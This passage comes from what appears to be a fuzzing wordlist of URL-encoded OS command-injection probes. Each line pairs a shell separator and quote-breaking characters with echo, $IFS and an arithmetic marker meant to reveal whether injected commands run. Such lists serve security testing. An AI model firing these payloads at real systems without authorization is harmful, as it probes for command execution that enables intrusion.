cho%20JCFSBN$((7%2B70))$(echo%20JCFSBN)JCFSBN%22\n;echo$IFSBUCQOY$((75%2B89))$(echo$IFSBUCQOY)BUCQOY%22\n&echo$IFSINJILM$((12%2B86))$(echo$IFSINJILM)INJILM%22\n|echo$IFSMNCLPS$((56%2B63))$(echo$IFSMNCLPS)MNCLPS%22\n||echo$IFSMWNDWI$((5%2B99))$(echo$IFSMWNDWI)MWNDWI%22\n&&echo$IFSXITZZU$((72%2B57))$(echo$IFSXITZZU)XITZZU%22\n%0aecho$IFSKGOAAS$((28%2B98))$(echo$IFSKGOAAS)KGOAAS%22\n%3Becho$IFSHLZSZR$((18%2B53))$(echo$IFSHLZSZR)HLZSZR%22\n%26echo$IFSFZIREE$((3%2B27))$(echo$IFSFZIREE)FZIREE%22\n%26%26echo$IFSBFEQYV$((65%2B19))$(echo$IFSBFEQYV)BFEQYV%22\n%7Cecho$IFSXHRRAU$((47%2B66))$(echo$IFSXHRRAU)XHRRAU%22\n%7C%7Cecho$IFSVNAEYF$((4%2B92))$(echo$IFSVNAEYF)VNAEYF%22\necho$IFSMYDTOQ$((99%2B59))$(echo$IFSMYDTOQ)MYDTOQ%5C%5C\n%20echo%20MIBJNK$((69%2B50))$(echo%20MIBJNK)MIBJNK%5C%5C\n;echo$IFSKUMZWI$((52%2B68))$(echo$IFSKUMZWI)KUMZWI%5C%5C\n&echo$IFSRXZUMT$((27%2B20))$(echo$IFSRXZUMT)RXZUMT%5C%5C\n|echo$IFSGQAGTE$((24%2B60))$(echo$IFSGQAGTE)GQAGTE%5C%5C\n||echo$IFSEWIIAA$((5%2B86))$(echo$IFSEWIIAA)EWIIAA%5C%5C\n&&echo$IFSHBSRNA$((99%2B81))$(echo$IFSHBSRNA)HBSRNA%5C%5C\n%0aecho$IFSWNSKHN$((91%2B97))$(echo$IFSWNSKHN)WNSKHN%5C%5C\n%3Becho$IFSXCIDGL$((84%2B77))$(echo$IFSXCIDGL)XCIDGL%5C%5C\n%26echo$IFSTBOHOL$((39%2B63))$(echo$IFSTBOHOL)TBOHOL%5C%5C\n%26%26echo$IFSMEDCEY$((8%2B25))$(echo$IFSMEDCEY)MEDCEY%5C%5C\n%7Cecho$IFSZVMYPN$((92%2B94))$(echo$IFSZVMYPN)ZVMYPN%5C%5C\n%7C%7Cecho$IFSLZMNQW$((6%2B85))$(echo$IFSLZMNQW)LZMNQW%5C%5C\necho$IFSUBGQBR$((73%2B83))$(echo$IFSUBGQBR)UBGQBR%2F%2F\n%20echo%20XRKWTL$((1%2B66))$(echo%20XRKWTL)XRKWTL%2F%2F\n;echo$IFSMTRJCW$((52%2B99))$(echo$IFSMTRJCW)MTRJCW%2F%2F\n&echo$IFSNRXRKE$((21%2B36))$(echo$IFSNRXRKE)NRXRKE%2F%2F\n|echo$IFSNUKWZR$((1%2B54))$(echo$IFSNUKWZR)NUKWZR%2F%2F\n||echo$IFSCQDQPG$((96%2B92))$(echo$IFSCQDQPG)CQDQPG%2F%2F\n&&echo$IFSGTBDWG$((18%2B89))$(echo$IFSGTBDWG)GTBDWG%2F%2F\n%0aecho$IFSOVTGKS$((3%2B77))$(echo$IFSOVTGKS)OVTGKS%2F%2F\n%3Becho$IFSOTOVJM$((53%2B74))$(echo$IFSOTOVJM)OTOVJM%2F%2F\n%26echo$IFSUUYWYN$((46%2B27))$(echo$IFSUUYWYN)UUYWYN%2F%2F\n%26%26echo$IFSLQSHYA$((83%2B67))$(echo$IFSLQSHYA)LQSHYA%2F%2F\n%7Cecho$IFSIBAZCJ$((13%2B42))$(echo$IFSIBAZCJ)IBAZCJ%2F%2F\n%7C%7Cecho$IFSQFSVNV$((60%2B49))$(echo$IFSQFSVNV)QFSVNV%2F%2F\necho$IFSPNBSWR$((27%2B39))$(echo$IFSPNBSWR)PNBSWR%26\n%20echo%20ZTYATW$((99%2B18))$(echo%20ZTYATW)ZTYATW%26\n;echo$IFSSKFBVG$((56%2B51))$(echo$IFSSKFBVG)SKFBVG%26\n&echo$IFSPNMRRI$((20%2B12))$(echo$IFSPNMRRI)PNMRRI%26\n|echo$IFSZRNWFA$((82%2B53))$(echo$IFSZRNWFA)ZRNWFA%26\n||echo$IFSZFIGIN$((20%2B19))$(echo$IFSZFIGIN)ZFIGIN%26\n&&echo$IFSCPFUWZ$((25%2B32))$(echo$IFSCPFUWZ)CPFUWZ%26\n%0aecho$IFSNWIALT$((43%2B48))$(echo$IFSNWIALT)NWIALT%26\n%3Becho$IFSIKLHQK$((57%2B99))$(echo$IFSIKLHQK)IKLHQK%26\n%26echo$IFSRAALVW$((18%2B87))$(echo$IFSRAALVW)RAALVW%26\n%26%26echo$IFSGNWSGN$((55%2B55))$(echo$IFSGNWSGN)GNWSGN%26\n%7Cecho$IFSUUEUUP$((8%2B33))$(echo$IFSUUEUUP)UUEUUP%26\n%7C%7Cecho$IFSYCIWOC$((49%2B44))$(echo$IFSYCIWOC)YCIWOC%26\necho$IFSCOBXOA$((38%2B15))$(echo$IFSCOBXOA)COBXOA%7C\n%20echo%20MUBTOH$((84%2B39))$(echo%20MUBTOH)MUBTOH%7C\n;echo$IFSVQMZED$((6%2B60))$(echo$IFSVQMZED)VQMZED%7C\n&echo$IFSUVSLMN$((90%2B46))$(echo$IFSUVSLMN)UVSLMN%7C\n|echo$IFSCSPCGY$((33%2B53))$(echo$IFSCSPCGY)CSPCGY%7C\n||echo$IFSJYWQAM$((97%2B96))$(echo$IFSJYWQAM)JYWQAM%7C\n&&echo$IFSRRGUBD$((41%2B37))$(echo$IFSRRGUBD)RRGUBD%7C\n%0aecho$IFSOIFCVY$((56%2B63))$(echo$IFSOIFCVY)OIFCVY%7C\n%3Becho$IFSZULPXH$((28%2B66))$(echo$IFSZULPXH)ZULPXH%7C\n%26echo$IFSRSDEJN$((15%2B54))$(echo$IFSRSDEJN)RSDEJN%7C\n%26%26echo$IFSRIODOR$((41%2B80))$(echo$IFSRIODOR)RIODOR%7C\n%7Cecho$IFSLAITXQ$((45%2B1))$(echo$IFSLAITXQ)LAITXQ%7C\n%7C%7Cecho$IFSAEFKTR$((17%2B29))$(echo$IFSAEFKTR)AEFKTR%7C\n&echo$IFSQLXHQO$((79%2B66))$(echo$IFSQLXHQO)QLXHQO\n&%20echo%20MFHLGK$((15%2B22))$(echo%20MFHLGK)MFHLGK\n;echo$IFSTLVRXR$((1%2B4))$(echo$IFSTLVRXR)TLVRXR\n&echo$IFSSSWXIY$((27%2B62))$(echo$IFSSSWXIY)SSWXIY\n|echo$IFSWWTABV$((78%2B81))$(echo$IFSWWTABV)WWTABV\n||echo$IFSPYNPEK$((48%2B2))$(echo$IFSPYNPEK)PYNPEK\n&&echo$IFSVGQLPU$((4%2B29))$(echo$IFSVGQLPU)VGQLPU\n%0aecho$IFSKTAVMG$((29%2B10))$(echo$IFSKTAVMG)KTAVMG\n%3Becho$IFSAMABXP$((6%2B24))$(echo$IFSAMABXP)AMABXP\n%26echo$IFSNHKZXU$((79%2B34))$(echo$IFSNHKZXU)NHKZXU\n%26%26echo$IFSKNHRIG$((80%2B9))$(echo$IFSKNHRIG)KNHRIG\n%7Cecho$IFSUNCOLW$((89%2B19))$(echo$IFSUNCOLW)UNCOLW\n%7C%7Cecho$IFSKJHMXN$((3%2B73))$(echo$IFSKJHMXN)KJHMXN\necho$IFSPHZRPA$((83%2B65))$(echo$IFSPHZRPA)PHZRPA'\n%20echo%20VDKKTU$((48%2B39))$(echo%20VDKKTU)VDKKTU'\n;echo$IFSVMHPMF$((49%2B68))$(echo$IFSVMHPMF)VMHPMF'\n&echo$IFSDMXXTC$((63%2B90))$(echo$IFSDMXXTC)DMXXTC'\n|echo$IFSLITPAE$((90%2B42))$(echo$IFSLITPAE)LITPAE'\n||echo$IFSHBKZPS$((90%2B74))$(echo$IFSHBKZPS)HBKZPS'\n&&echo$IFSKGICZJ$((97%2B57))$(echo$IFSKGICZJ)KGICZJ'\n%0aecho$IFSAPAMDC$((36%2B45))$(echo$IFSAPAMDC)APAMDC'\n%3Becho$IFSZZSYFZ$((36%2B96))$(echo$IFSZZSYFZ)ZZSYFZ'\n%26echo$IFSHYWHUO$((82%2B84))$(echo$IFSHYWHUO)HYWHUO'\n%26%26echo$IFSAHQKXM$((2%2B20))$(echo$IFSAHQKXM)AHQKXM'\n%7Cecho$IFSDJDWOB$((53%2B10))$(echo$IFSDJDWOB)DJDWOB'\n%7C%7Cecho$IFSJHTHVW$((39%2B26))$(echo$IFSJHTHVW)JHTHVW'\necho$IFSNCOJPQ$((15%2B89))$(echo$IFSNCOJPQ)NCOJPQ\"\n%20echo%20PHHQZJ$((49%2B63))$(echo%20PHHQZJ)PHHQZJ\"\n;echo$IFSVABEPU$((8%2B54))$(echo$IFSVABEPU)VABEPU\"\n&echo$IFSMONACC$((64%2B29))$(echo$IFSMONACC)MONACC\"\n|echo$IFSTCSNMN$((49%2B88))$(echo$IFSTCSNMN)TCSNMN\"\n||echo$IFSYTRRVT$((47%2B76))$(echo$IFSYTRRVT)YTRRVT\"\n&&echo$IFSUGIZFE$((95%2B79))$(echo$IFSUGIZFE)UGIZFE\"\n%0aecho$IFSJCTEQY$((49%2B31))$(echo$IFSJCTEQY)JCTEQY\"\n%3Becho$IFSLWOCMM$((20%2B40))$(echo$IFSLWOCMM)LWOCMM\"\n%26echo$IFSNKAEHH$((28%2B48))$(echo$IFSNKAEHH)NKAEHH\"\n%26%26echo$IFSAHYRFK$((59%2B15))$(echo$IFSAHYRFK)AHYRFK\"\n%7Cecho$IFSQIUHMW$((18%2B27))$(echo$IFSQIUHMW)QIUHMW\"\n%7C%7Cecho$IFSKELZXS$((60%2B60))$(echo$IFSKELZXS)KELZXS\"\necho$IFSHIVKNH$((59%2B63))$(echo$IFSHIVKNH)HIVKNH\n%20echo%20GBXOPJ$((13%2B32))$(echo%20GBXOPJ)GBXOPJ\n;echo$IFSGBSBJK$((78%2B77))$(echo$IFSGBSBJK)GBSBJK\n&echo$IFSJUJDFI$((75%2B24))$(echo$IFSJUJDFI)JUJDFI\n|echo$IFSCYOSPJ$((41%2B88))$(echo$IFSCYOSPJ)CYOSPJ\n||echo$IFSPQBYOG$((45%2B3))$(echo$IFSPQBYOG)PQBYOG\n&&echo$IFSWQDKJH$((20%2B60))$(echo$IFSWQDKJH)WQDKJH\n%0aecho$IFSXOCRRA$((3%2B1))$(echo$IFSXOCRRA)XOCRRA\n%3Becho$IFSVTOBEN$((34%2B25))$(echo$IFSVTOBEN)VTOBEN\n%26echo$IFSSXZPOT$((38%2B66))$(echo$IFSSXZPOT)SXZPOT\n%26%26echo$IFSGEDMFF$((95%2B24))$(echo$IFSGEDMFF)GEDMFF\n%7Cecho$IFSPCVHGX$((0%2B12))$(echo$IFSPCVHGX)PCVHGX\n%7C%7Cecho$IFSXSJZOO$((37%2B56))$(echo$IFSXSJZOO)XSJZOO\necho$IFSCMWXRB$((87%2B22))$(echo$IFSCMWXRB)CMWXRB//\n%20echo%20KRHFKC$((96%2B42))$(echo%20KRHFKC)KRHFKC//\n;echo$IFSXLBAJP$((6%2B21))$(echo$IFSXLBAJP)XLBAJP//\n&echo$IFSUPQDIN$((21%2B80))$(echo$IFSUPQDIN)UPQDIN//\n|echo$IFSMCYFYC$((94%2B33))$(echo$IFSMCYFYC)MCYFYC//\n||echo$IFSWYWPXY$((38%2B95))$(echo$IFSWYWPXY)WYWPXY//\n&&echo$IFSVJEYML$((92%2B5))$(echo$IFSVJEYML)VJEYML//\n%0aecho$IFSRWHBOB$((34%2B55))$(echo$IFSRWHBOB)RWHBOB//\n%3Becho$IFSWWQHXI$((34%2B88))$(echo$IFSWWQHXI)WWQHXI//\n%26echo$IFSXQTVXE$((32%2B91))$(echo$IFSXQTVXE)XQTVXE//\n%26%26echo$IFSMLKYIC$((73%2B57))$(echo$IFSMLKYIC)MLKYIC//\n%7Cecho$IFSTILOLK$((60%2B88))$(echo$IFSTILOLK)TILOLK//\n%7C%7Cecho$IFSAFCKFD$((42%2B76))$(echo$IFSAFCKFD)AFCKFD//\necho$IFSDMXBXH$((83%2B95))$(echo$IFSDMXBXH)DMXBXH\\\n%20echo%20WGOISG$((75%2B94))$(echo%20WGOISG)WGOISG\\\n;echo$IFSGJTRRT$((27%2B79))$(echo$IFSGJTRRT)GJTRRT\\\n&echo$IFSIDNISX$((2%2B59))$(echo$IFSIDNISX)IDNISX\\\n|echo$IFSBHTKLO$((25%2B57))$(echo$IFSBHTKLO)BHTKLO\\\n||echo$IFSKDHDGC$((60%2B80))$(echo$IFSKDHDGC)KDHDGC\\\n&&echo$IFSHDXHXA$((99%2B37))$(echo$IFSHDXHXA)HDXHXA\\\n%0aecho$IFSDQGTJY$((5%2B21))$(echo$IFSDQGTJY)DQGTJY\\\n%3Becho$IFSGCRBKK$((37%2B88))$(echo$IFSGCRBKK)GCRBKK\\\n%26echo$IFSTZBZPJ$((19%2B93))$(echo$IFSTZBZPJ)TZBZPJ\\\n%26%26echo$IFSHWUDRE$((0%2B26))$(echo$IFSHWUDRE)HWUDRE\\\n%7Cecho$IFSHJFTBK$((77%2B76))$(echo$IFSHJFTBK)HJFTBK\\\n%7C%7Cecho$IFSWNQFEN$((48%2B59))$(echo$IFSWNQFEN)WNQFEN\\\necho$IFSFOGUBG$((54%2B25))$(echo$IFSFOGUBG)FOGUBG&\n%20echo%20THSJII$((27%2B68))$(echo%20THSJII)THSJII&\n;echo$IFSONOVRU$((18%2B41))$(echo$IFSONOVRU)ONOVRU&\n&echo$IFSPTCLJM$((60%2B39))$(echo$IFSPTCLJM)PTCLJM&\n|echo$IFSCYPEHE$((10%2B73))$(echo$IFSCYPEHE)CYPEHE&\n||echo$IFSLRYRKA$((33%2B67))$(echo$IFSLRYRKA)LRYRKA&\n&&echo$IFSVGHYXY$((50%2B76))$(echo$IFSVGHYXY)VGHYXY&\n%0aecho$IFSZUCAWY$((35%2B43))$(echo$IFSZUCAWY)ZUCAWY&\n%3Becho$IFSQSYGGO$((28%2B83))$(echo$IFSQSYGGO)QSYGGO&\n%26echo$IFSNWCZGN$((26%2B20))$(echo$IFSNWCZGN)NWCZGN&\n%26%26echo$IFSSGSOLC$((27%2B7))$(echo$IFSSGSOLC)SGSOLC&\n%7Cecho$IFSQBNKUQ$((13%2B79))$(echo$IFSQBNKUQ)QBNKUQ&\n%7C%7Cecho$IFSVKQXGG$((70%2B99))$(echo$IFSVKQXGG)VKQXGG&\necho$IFSRVGTQR$((51%2B29))$(echo$IFSRVGTQR)RVGTQR|\n%20echo%20EYXSLH$((96%2B88))$(echo%20EYXSLH)EYXSLH|\n;echo$IFSNXMKIN$((19%2B24))$(echo$IFSNXMKIN)NXMKIN|\n&echo$IFSXDFWBW$((45%2B98))$(echo$IFSXDFWBW)XDFWBW|\n|echo$IFSKQQQWP$((52%2B17))$(echo$IFSKQQQWP)KQQQWP|\n||echo$IFSGIFLOU$((73%2B67))$(echo$IFSGIFLOU)GIFLOU|\n&&echo$IFSYPPVOY$((46%2B66))$(echo$IFSYPPVOY)YPPVOY|\n%0aecho$IFSXLQCAL$((78%2B24))$(echo$IFSXLQCAL)XLQCAL|\n%3Becho$IFSTWQPEL$((97%2B38))$(echo$IFSTWQPEL)TWQPEL|\n%26echo$IFSGUZCFQ$((77%2B81))$(echo$IFSGUZCFQ)GUZCFQ|\n%26%26echo$IFSLJOFVO$((24%2B48))$(echo$IFSLJOFVO)LJOFVO|\n%7Cecho$IFSMCDDQX$((44%2B84))$(echo$IFSMCDDQX)MCDDQX|\n%7C%7Cecho$IFSGCTODU$((64%2B18))$(echo$IFSGCTODU)GCTODU|\necho$IFSIEJMEW$((30%2B85))$(echo$IFSIEJMEW)IEJMEW%27\n%20echo%20RTIRFH$((5%2B80))$(echo%20RTIRFH)RTIRFH%27\n;echo$IFSMTICKY$((40%2B79))$(echo$IFSMTICKY)MTICKY%27\n&echo$IFSPSIGPS$((6%2B9))$(echo$IFSPSIGPS)PSIGPS%27\n|echo$IFSDVQOYX$((82%2B10))$(echo$IFSDVQOYX)DVQOYX%27\n||echo$IFSTFMZPK$((99%2B59))$(echo$IFSTFMZPK)TFMZPK%27\n&&echo$IFSZENPOV$((15%2B5))$(echo$IFSZENPOV)ZENPOV%27\n%0aecho$IFSFXFLFR$((67%2B52))$(echo$IFSFXFLFR)FXFLFR%27\n%3Becho$IFSLZZDLP$((79%2B69))$(echo$IFSLZZDLP)LZZDLP%27\n%26echo$IFSQGKCTR$((36%2B15))$(echo$IFSQGKCTR)QGKCTR%27\n%26%26echo$IFSNCHUMN$((98%2B30))$(echo$IFSNCHUMN)NCHUMN%27\n%7Cecho$IFSGUAVSF$((73%2B82))$(echo$IFSGUAVSF)GUAVSF%27\n%7C%7Cecho$IFSOQAOQJ$((62%2B26))$(echo$IFSOQAOQJ)OQAOQJ%27\necho$IFSJIKZPM$((54%2B42))$(echo$IFSJIKZPM)JIKZPM%22\n%20echo%20XQIFQU$((35%2B24))$(echo%20XQIFQU)XQIFQU%22\n;echo$IFSXKJHCR$((60%2B67))$(echo$IFSXKJHCR)XKJHCR%22\n&echo$IFSAKVCNQ$((27%2B21))$(echo$IFSAKVCNQ)AKVCNQ%22\n|echo$IFSOLRTPJ$((84%2B81))$(echo$IFSOLRTPJ)OLRTPJ%22\n||echo$IFSBEZGQL$((84%2B6))$(echo$IFSBEZGQL)BEZGQL%22\n&&echo$IFSAUBGIO$((90%2B39))$(echo$IFSAUBGIO)AUBGIO%22\n%0aecho$IFSQSKWMC$((77%2B87))$(echo$IFSQSKWMC)QSKWMC%22\n%3Becho$IFSVSJXTC$((59%2B79))$(echo$IFSVSJXTC)VSJXTC%22\n%26echo$IFSFXPYJN$((43%2B47))$(echo$IFSFXPYJN)FXPYJN%22\n%26%26echo$IFSZFLJBI$((82%2B4))$(echo$IFSZFLJBI)ZFLJBI%22\n%7Cecho$IFSIWTKTR$((97%2B63))$(echo$IFSIWTKTR)IWTKTR%22\n%7C%7Cecho$IFSOQUJVO$((83%2B79))$(echo$IFSOQUJVO)OQUJVO%22\necho$IFSKNEEFY$((64%2B22))$(echo$IFSKNEEFY)KNEEFY%5C%5C\n%20echo%20NWXHAH$((8%2B91))$(echo%20NWXHAH)NWXHAH%5C%5C\n;echo$IFSBFZZSW$((3%2B5))$(echo$IFSBFZZSW)BFZZSW%5C%5C\n&echo$IFSROVZMD$((87%2B57))$(echo$IFSROVZMD)ROVZMD%5C%5C\n|echo$IFSKMAXDB$((68%2B24))$(echo$IFSKMAXDB)KMAXDB%5C%5C\n||echo$IFSVNXMDZ$((95%2B0))$(echo$IFSVNXMDZ)VNXMDZ%5C%5C\n&&echo$IFSXUVPOU$((27%2B3))$(echo$IFSXUVPOU)XUVPOU%5C%5C\n%0aecho$IFSZFETQZ$((73%2B0))$(echo$IFSZFETQZ)ZFETQZ%5C%5C\n%3Becho$IFSMLEFQQ$((44%2B34))$(echo$IFSMLEFQQ)MLEFQQ%5C%5C\n%26echo$IFSWBFNGR$((6%2B4))$(echo$IFSWBFNGR)WBFNGR%5C%5C\n%26%26echo$IFSPENFBQ$((61%2B76))$(echo$IFSPENFBQ)PENFBQ%5C%5C\n%7Cecho$IFSACIPGG$((38%2B64))$(echo$IFSACIPGG)ACIPGG%5C%5C\n%7C%7Cecho$IFSSIGJRV$((49%2B39))$(echo$IFSSIGJRV)SIGJRV%5C%5C\necho$IFSZZSSEM$((14%2B66))$(echo$IFSZZSSEM)ZZSSEM%2F%2F\n%20echo%20APYFLP$((24%2B89))$(echo%20APYFLP)APYFLP%2F%2F\n;echo$IFSGLSCFU$((80%2B7))$(echo$IFSGLSCFU)GLSCFU%2F%2F\n&echo$IFSZRWAWQ$((82%2B93))$(echo$IFSZRWAWQ)ZRWAWQ%2F%2F\n|echo$IFSSCCGYA$((3%2B93))$(echo$IFSSCCGYA)SCCGYA%2F%2F\n||echo$IFSEYVRFU$((99%2B52))$(echo$IFSEYVRFU)EYVRFU%2F%2F\n&&echo$IFSBMUAXQ$((31%2B95))$(echo$IFSBMUAXQ)BMUAXQ%2F%2F\n%0aecho$IFSERJIXU$((33%2B2))$(echo$IFSERJIXU)ERJIXU%2F%2F\n%3Becho$IFSVYLEJO$((26%2B40))$(echo$IFSVYLEJO)VYLEJO%2F%2F\n%26echo$IFSYNKNBL$((5%2B94))$(echo$IFSYNKNBL)YNKNBL%2F%2F\n%26%26echo$IFSUCPLDI$((23%2B55))$(echo$IFSUCPLDI)UCPLDI%2F%2F\n%7Cecho$IFSMZTBUS$((51%2B6))$(echo$IFSMZTBUS)MZTBUS%2F%2F\n%7C%7Cecho$IFSWPWCJS$((96%2B60))$(echo$IFSWPWCJS)WPWCJS%2F%2F\necho$IFSVVUMIP$((18%2B35))$(echo$IFSVVUMIP)VVUMIP%26\n%20echo%20JDCGXZ$((41%2B96))$(echo%20JDCGXZ)JDCGXZ%26\n;echo$IFSUTEXYG$((37%2B68))$(echo$IFSUTEXYG)UTEXYG%26\n&echo$IFSQRHEWM$((81%2B88))$(echo$IFSQRHEWM)QRHEWM%26\n|echo$IFSLADZJA$((28%2B57))$(echo$IFSLADZJA)LADZJA%26\n||echo$IFSFTKMXB$((12%2B13))$(echo$IFSFTKMXB)FTKMXB%26\n&&echo$IFSTGBJOB$((42%2B77))$(echo$IFSTGBJOB)TGBJOB%26\n%0aecho$IFSFQSEMN$((91%2B33))$(echo$IFSFQSEMN)FQSEMN%26\n%3Becho$IFSTLHIDP$((89%2B98))$(echo$IFSTLHIDP)TLHIDP%26\n%26echo$IFSZBBPPT$((70%2B6))$(echo$IFSZBBPPT)ZBBPPT%26\n%26%26echo$IFSITMNHS$((43%2B23))$(echo$IFSITMNHS)ITMNHS%26\n%7Cecho$IFSJJYVVI$((35%2B34))$(echo$IFSJJYVVI)JJYVVI%26\n%7C%7Cecho$IFSLPCDFP$((34%2B63))$(echo$IFSLPCDFP)LPCDFP%26\necho$IFSYJNHDQ$((89%2B22))$(echo$IFSYJNHDQ)YJNHDQ%7C\n%20echo%20EEIYPU$((65%2B19))$(echo%20EEIYPU)EEIYPU%7C\n;echo$IFSDWCZMD$((39%2B76))$(echo$IFSDWCZMD)DWCZMD%7C\n&echo$IFSJSBLAG$((55%2B76))$(echo$IFSJSBLAG)JSBLAG%7C\n|echo$IFSYOKOTJ$((77%2B9))$(echo$IFSYOKOTJ)YOKOTJ%7C\n||echo$IFSCNIKQI$((90%2B80))$(echo$IFSCNIKQI)CNIKQI%7C\n&&echo$IFSRZHDUN$((30%2B97))$(echo$IFSRZHDUN)RZHDUN%7C\n%0aecho$IFSCPVCLF$((68%2B4))$(echo$IFSCPVCLF)CPVCLF%7C\n%3Becho$IFSOMAEJD$((8%2B77))$(echo$IFSOMAEJD)OMAEJD%7C\n%26echo$IFSDOPRZR$((76%2B69))$(echo$IFSDOPRZR)DOPRZR%7C\n%26%26echo$IFSUEFESK$((60%2B44))$(echo$IFSUEFESK)UEFESK%7C\n%7Cecho$IFSMQMMWX$((90%2B32))$(echo$IFSMQMMWX)MQMMWX%7C\n%7C%7Cecho$IFSBVFYIU$((58%2B91))$(echo$IFSBVFYIU)BVFYIU%7C\n%27echo$IFSBUSFOU$((97%2B37))$(echo$IFSBUSFOU)BUSFOU\n%27%20echo%20LNVEVW$((12%2B50))$(echo%20LNVEVW)LNVEVW\n%27;echo$IFSCGEDHZ$((15%2B86))$(echo$IFSCGEDHZ)CGEDHZ\n%27&echo$IFSGDHEQM$((75%2B6))$(echo$IFSGDHEQM)GDHEQM\n%27|echo$IFSFRPQGH$((5%2B72))$(echo$IFSFRPQGH)FRPQGH\n%27||echo$IFSUBXJUF$((52%2B61))$(echo$IFSUBXJUF)UBXJUF\n%27&&echo$IFSQNMPMK$((16%2B94))$(echo$IFSQNMPMK)QNMPMK\n%27%0aecho$IFSHPJBTS$((68%2B1))$(echo$IFSHPJBTS)HPJBTS\n%27%3Becho$IFSOLZUHI$((11%2B76))$(echo$IFSOLZUHI)OLZUHI\n%27%26echo$IFSJWPFEA$((61%2B64))$(echo$IFSJWPFEA)JWPFEA\n%27%26%26echo$IFSYRTQWI$((45%2B7))$(echo$IFSYRTQWI)YRTQWI\n%27%7Cecho$IFSOJYTMR$((97%2B63))$(echo$IFSOJYTMR)OJYTMR\n%27%7C%7Cecho$IFSBJRIVZ$((1%2B4))$(echo$IFSBJRIVZ)BJRIVZ\n%27echo$IFSFYUXPA$((17%2B24))$(echo$IFSFYUXPA)FYUXPA'\n%27%20echo%20KFJYWO$((38%2B75))$(echo%20KFJYWO)KFJYWO'\n%27;echo$IFSUEBNRK$((21%2B43))$(echo$IFSUEBNRK)UEBNRK'\n%27&echo$IFSDSFELH$((48%2B16))$(echo$IFSDSFELH)DSFELH'\n%27|echo$IFSCJAOLS$((84%2B11))$(echo$IFSCJAOLS)CJAOLS'\n%27||echo$IFSXGULGC$((75%2B10))$(echo$IFSXGULGC)XGULGC'\n%27&&echo$IFSOACPHB$((5%2B90))$(echo$IFSOACPHB)OACPHB'\n%27%0aecho$IFSXIUKHX$((92%2B44))$(echo$IFSXIUKHX)XIUKHX'\n%27%3Becho$IFSQSZIFF$((21%2B56))$(echo$IFSQSZIFF)QSZIFF'\n%27%26echo$IFSVDFJNU$((23%2B92))$(echo$IFSVDFJNU)VDFJNU'\n%27%26%26echo$IFSJDHREU$((48%2B43))$(echo$IFSJDHREU)JDHREU'\n%27%7Cecho$IFSRWDBVK$((60%2B13))$(echo$IFSRWDBVK)RWDBVK'\n%27%7C%7Cecho$IFSHNNQHD$((64%2B5))$(echo$IFSHNNQHD)HNNQHD'\n%27echo$IFSOXXBHC$((79%2B27))$(echo$IFSOXXBHC)OXXBHC\"\n%27%20echo%20RCKFYK$((92%2B33))$(echo%20RCKFYK)RCKFYK\"\n%27;echo$IFSFQQLKE$((2%2B42))$(echo$IFSFQQLKE)FQQLKE\"\n%27&echo$IFSHKZBYJ$((43%2B76))$(echo$IFSHKZBYJ)HKZBYJ\"\n%27|echo$IFSXRLZPA$((20%2B95))$(echo$IFSXRLZPA)XRLZPA\"\n%27||echo$IFSLYKBHC$((81%2B81))$(echo$IFSLYKBHC)LYKBHC\"\n%27&&echo$IFSHDYGZO$((21%2B59))$(echo$IFSHDYGZO)HDYGZO\"\n%27%0aecho$IFSDOHOCR$((5%2B11))$(echo$IFSDOHOCR)DOHOCR\"\n%27%3Becho$IFSVMLEXC$((19%2B49))$(echo$IFSVMLEXC)VMLEXC\"\n%27%26echo$IFSHNQWXR$((73%2B6))$(echo$IFSHNQWXR)HNQWXR\"\n%27%26%26echo$IFSJPJHMZ$((45%2B17))$(echo$IFSJPJHMZ)JPJHMZ\"\n%27%7Cecho$IFSWNRKQX$((15%2B90))$(echo$IFSWNRKQX)WNRKQX\"\n%27%7C%7Cecho$IFSGVINFF$((91%2B35))$(echo$IFSGVINFF)GVINFF\"\n%27echo$IFSISEHFM$((85%2B7))$(echo$IFSISEHFM)ISEHFM\n%27%20echo%20RFTTCP$((93%2B3))$(echo%20RFTTCP)RFTTCP\n%27;echo$IFSNHOFBW$((39%2B34))$(echo$IFSNHOFBW)NHOFBW\n%27&echo$IFSOZTHGM$((17%2B60))$(echo$IFSOZTHGM)OZTHGM\n%27|echo$IFSUJIVOM$((80%2B49))$(echo$IFSUJIVOM)UJIVOM\n%27||echo$IFSWKWPWF$((88%2B99))$(echo$IFSWKWPWF)WKWPWF\n%27&&echo$IFSOVRJWM$((23%2B86))$(echo$IFSOVRJWM)OVRJWM\n%27%0aecho$IFSTWUNTD$((44%2B76))$(echo$IFSTWUNTD)TWUNTD\n%27%3Becho$IFSIFOFAH$((63%2B44))$(echo$IFSIFOFAH)IFOFAH\n%27%26echo$IFSUEVCYJ$((85%2B1))$(echo$IFSUEVCYJ)UEVCYJ\n%27%26%26echo$IFSEWMPRK$((42%2B18))$(echo$IFSEWMPRK)EWMPRK\n%27%7Cecho$IFSYKIMMG$((43%2B81))$(echo$IFSYKIMMG)YKIMMG\n%27%7C%7Cecho$IFSCJHVPM$((51%2B52))$(echo$IFSCJHVPM)CJHVPM\n%27echo$IFSKCWCVA$((72%2B1))$(echo$IFSKCWCVA)KCWCVA//\n%27%20echo%20AUYIEK$((56%2B8))$(echo%20AUYIEK)AUYIEK//\n%27;echo$IFSOTEELC$((4%2B24))$(echo$IFSOTEELC)OTEELC//\n%27&echo$IFSZQMJNG$((96%2B27))$(echo$IFSZQMJNG)ZQMJNG//\n%27|echo$IFSKGTHSZ$((31%2B23))$(echo$IFSKGTHSZ)KGTHSZ//\n%27||echo$IFSOQCUYN$((22%2B3))$(echo$IFSOQCUYN)OQCUYN//\n%27&&echo$IFSKQBPBW$((96%2B27))$(echo$IFSKQBPBW)KQBPBW//\n%27%0aecho$IFSDLBZBO$((23%2B48))$(echo$IFSDLBZBO)DLBZBO//\n%27%3Becho$IFSCFBNIF$((41%2B28))$(echo$IFSCFBNIF)CFBNIF//\n%27%26echo$IFSJMGRNT$((10%2B51))$(echo$IFSJMGRNT)JMGRNT//\n%27%26%26echo$IFSLVYIOD$((15%2B38))$(echo$IFSLVYIOD)LVYIOD//\n%27%7Cecho$IFSWWFYLU$((17%2B21))$(echo$IFSWWFYLU)WWFYLU//\n%27%7C%7Cecho$IFSRRGUPN$((69%2B6))$(echo$IFSRRGUPN)RRGUPN//\n%27echo$IFSQTYJUU$((57%2B7))$(echo$IFSQTYJUU)QTYJUU\\\n%27%20echo%20NPYOVU$((6%2B61))$(echo%20NPYOVU)NPYOVU\\\n%27;echo$IFSIZUWXV$((86%2B66))$(echo$IFSIZUWXV)IZUWXV\\\n%27&echo$IFSLRYHAU$((84%2B4))$(echo$IFSLRYHAU)LRYHAU\\\n%27|echo$IFSYHECUO$((78%2B29))$(echo